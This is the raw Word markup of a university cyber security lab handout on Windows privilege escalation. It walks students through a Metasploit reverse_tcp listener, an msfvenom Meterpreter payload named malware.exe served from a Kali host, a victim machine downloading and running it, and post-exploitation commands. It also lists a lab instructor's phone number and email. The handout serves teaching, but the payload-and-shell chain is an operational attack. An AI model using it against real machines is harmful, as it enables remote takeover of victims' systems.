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8413A68">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042276E5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="2880" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/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1943100" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="497" name="Picture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Picture 30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935896">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="409" w:beforeAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center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242424"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191942E9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="13"/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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Applied Cyber Security Industry Led-Course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008EE9E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1F4F4B">
      <w:pPr>
        <w:pStyle w:val="4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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Instructor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> XYZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E14BA5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C59CD3C">
      <w:pPr>
        <w:pStyle w:val="4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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Lab Instructor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Moeez Javed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B40E48">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203A03F3">
      <w:pPr>
        <w:pStyle w:val="5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40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>scalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D30600">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AACC4A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1FEB83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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</w:rPr>
        <w:t>Availability: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</w:rPr>
        <w:t>🕘 Monday to Friday: 9 AM – 5 PM (at CUST)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</w:rPr>
        <w:t>📩 After 5 PM: Please drop a message instead of calling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603C706A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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</w:rPr>
        <w:t>Lab Instructor Contact Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C86AFBD"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</w:rPr>
        <w:t>📞 Phone: +92 333 8744696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</w:rPr>
        <w:t>📧 Email: moeezjaved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yousafrana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</w:rPr>
        <w:t>@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="0C9D5585">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CE8DCE">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5259E0DC">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBBF60C">
      <w:pPr>
        <w:pStyle w:val="4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rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Window Privilege Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9029D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Privilege escalation is a crucial phase in cybersecurity where an attacker gains elevated access to a system, typically moving from a lower-level user to an administrative or root-level account. This process allows malicious actors to bypass security restrictions, access sensitive data, and maintain persistent control over compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E36F53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both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In this lab, you will learn how to exploit privilege escalation vulnerabilities using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gain persistence on a Windows machine. By simulating real-world attacks, you will understand how to detect and mitigate such threats effectively.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Setting Up Metasploit Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEF2A0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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 1: Find Your Kali Linux IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB8D0FC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</w:rPr>
        <w:t>Run this command in a terminal on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D035F9B">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ip a | grep inet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5A52E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</w:rPr>
        <w:t xml:space="preserve">Look for an IP like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.x.x</w:t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 xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.100.205</w:t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 xml:space="preserve">). Use this as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LHOST</w:t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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407D2C5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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 2: Set Up the Metasploit Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958FEDA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</w:rPr>
        <w:t>In a new terminal (Kali):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCF0D1">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8BF987">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34227B8A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF76EE8">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set LHOST 192.168.100.205  # Use your actual IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D643D1C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set LPORT 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116427C0">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FCC044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</w:rPr>
        <w:t>Leave this running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135373DF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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 3: Generate &amp; Host the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66BA90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</w:rPr>
        <w:t>Open another terminal (Kali):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076C6C7">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.205 LPORT=5555 -f exe -o /var/www/html/malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABED1D">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC6BBB9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5831840" cy="906780"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="1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8E53F">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116EA7EE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</w:rPr>
        <w:t>Check if the file is accessible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017742B1">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>curl http://192.168.100.205/malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC42793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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 4: Download &amp; Execute the Payload (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3BE11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</w:rPr>
        <w:t>On the Windows victim machine, open a browser and enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C327AE3">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.100.205/malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63487A">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Save and run the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25374A">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4791075" cy="3636010"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:docPr id="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rcRect l="5627" t="5293" r="701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774690" cy="3950970"/>
            <wp:effectExtent l="0" t="0" r="1270" b="11430"/>
            <wp:docPr id="3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9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3950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530A39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  <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C1A9B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  <w:t xml:space="preserve">                                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  <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6258560" cy="4571365"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="5" name="Picture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rcRect r="10048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457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1EFC51">
      <w:pPr>
        <w:pStyle w:val="1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76975" cy="3623310"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="11" name="Picture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rcRect l="8545" t="3623" r="10821" b="7148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623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E2701A">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50399732">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D5C770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auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Post-Exploitation with Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8A9CD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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Common Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C2127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Style w:val="13"/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  <w:t>System Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5310B">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD0E75B">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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 w14:paraId="5C79270E">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3215640" cy="1318260"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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2D5A0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Style w:val="13"/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  <w:t>List Processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301D3D9F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD42CB">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   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 xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:drawing>
